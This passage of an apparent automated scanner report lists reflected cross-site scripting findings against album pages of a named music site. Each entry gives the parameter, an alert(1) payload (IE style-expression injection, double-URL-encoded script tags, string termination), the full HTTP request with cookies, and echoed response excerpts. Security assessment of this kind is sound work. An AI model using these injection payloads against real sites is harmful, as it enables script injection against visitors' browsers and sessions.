Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Ke$ha - We R Who We R - BigP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?h=761402717eba52"style="x:expression(alert(1))"bbd03f69418" />
...[SNIP]...

2.80. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 310e7"style="x:expression(alert(1))"8dd416912c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/ke-ha/we-r-who-we-r?310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Ke$ha - We R Who We R - BigP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?310e7"style="x:expression(alert(1))"8dd416912c4=1" />
...[SNIP]...

2.81. http://bigpondmusic.com/album/keith-urban/get-closer3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd5fb'%3bae57aea958d was submitted in the REST URL parameter 1. This input was echoed as dd5fb';ae57aea958d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumdd5fb'%3bae57aea958d/keith-urban/get-closer3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumdd5fb';ae57aea958d';
   s.prop4 = 'keith-urban';
   s.prop5 = 'get-closer3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.82. http://bigpondmusic.com/album/keith-urban/get-closer3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a was submitted in the REST URL parameter 1. This input was echoed as 9e9b9"><script>alert(1)</script>81b0a7b047a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a/keith-urban/get-closer3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9e9b9"><script>alert(1)</script>81b0a7b047a/keith-urban/get-closer3" />
...[SNIP]...

2.83. http://bigpondmusic.com/album/keith-urban/get-closer3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aedb7"style="x:expression(alert(1))"7aaa14c0b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/keith-urban/get-closer3?aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 116006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Keith Urban - Get Closer - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/keith-urban/get-closer3?aedb7"style="x:expression(alert(1))"7aaa14c0b57=1" />
...[SNIP]...

2.84. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd was submitted in the REST URL parameter 1. This input was echoed as ef448"><script>alert(1)</script>b1a2ebf5bfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd/kings-of-leon/come-around-sundown HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumef448"><script>alert(1)</script>b1a2ebf5bfd/kings-of-leon/come-around-sundown" />
...[SNIP]...

2.85. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee02b'%3be0cb5b4004e was submitted in the REST URL parameter 1. This input was echoed as ee02b';e0cb5b4004e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumee02b'%3be0cb5b4004e/kings-of-leon/come-around-sundown HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumee02b';e0cb5b4004e';
   s.prop4 = 'kings-of-leon';
   s.prop5 = 'come-around-sundown';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' +
...[SNIP]...

2.86. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 was submitted in the h parameter. This input was echoed as 111ac"style="x:expression(alert(1))"f8333a80ae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/kings-of-leon/come-around-sundown?h=756194845111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123596


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Kings Of Leon - Come Around
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?h=756194845111ac"style="x:expression(alert(1))"f8333a80ae5" />
...[SNIP]...

2.87. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7da47"style="x:expression(alert(1))"9e1191b4fee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/kings-of-leon/come-around-sundown?7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Kings Of Leon - Come Around
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?7da47"style="x:expression(alert(1))"9e1191b4fee=1" />
...[SNIP]...

2.88. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9a3'%3b41e6347e7d8 was submitted in the REST URL parameter 1. This input was echoed as dd9a3';41e6347e7d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumdd9a3'%3b41e6347e7d8/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87907


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumdd9a3';41e6347e7d8';
   s.prop4 = 'mando-diao';
   s.prop5 = 'mtv-unplugged-above-and-beyond';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop
...[SNIP]...

2.89. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2 was submitted in the REST URL parameter 1. This input was echoed as 34330"><script>alert(1)</script>c8207af3af2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88075


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album34330"><script>alert(1)</script>c8207af3af2/mando-diao/mtv-unplugged-above-and-beyond" />
...[SNIP]...

2.90. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 was submitted in the h parameter. This input was echoed as 10ec8"style="x:expression(alert(1))"5d723e85314 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mando-diao/mtv-unplugged-above-and-beyond?h=76630773610ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 126887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mando Diao - MTV Unplugged -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond?h=76630773610ec8"style="x:expression(alert(1))"5d723e85314" />
...[SNIP]...

2.91. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
